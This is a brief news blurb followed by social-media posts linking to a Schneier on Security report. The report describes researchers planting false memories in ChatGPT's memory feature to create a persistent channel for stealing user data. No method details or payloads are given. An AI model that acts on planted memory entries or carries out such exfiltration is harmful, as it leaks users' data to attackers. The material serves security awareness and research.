A novel hacking technique has been discovered that exploits ChatGPT's memory to create a persistent data exfiltration channel. Researchers from Adversa AI demonstrated how hackers can plant false memories in ChatGPT, enabling them to steal user data in perpetuity. This method raises significant security concerns over manipulation and false information storage vulnerabilities in ChatGPT's new memory feature. The technique was discussed in a report by Schneier on Security.
Hacking ChatGPT by Planting False Memories into Its Data https://t.co/gjLL7pX88v
Hacking ChatGPT by Planting False Memories into Its Data: https://t.co/lW5TFTwlSC by Schneier on Security #infosec #cybersecurity #technology #news
Hacker plants false memories in ChatGPT to steal user data in perpetuity. Ghost in the shell becomes reality https://t.co/3tnipT64e4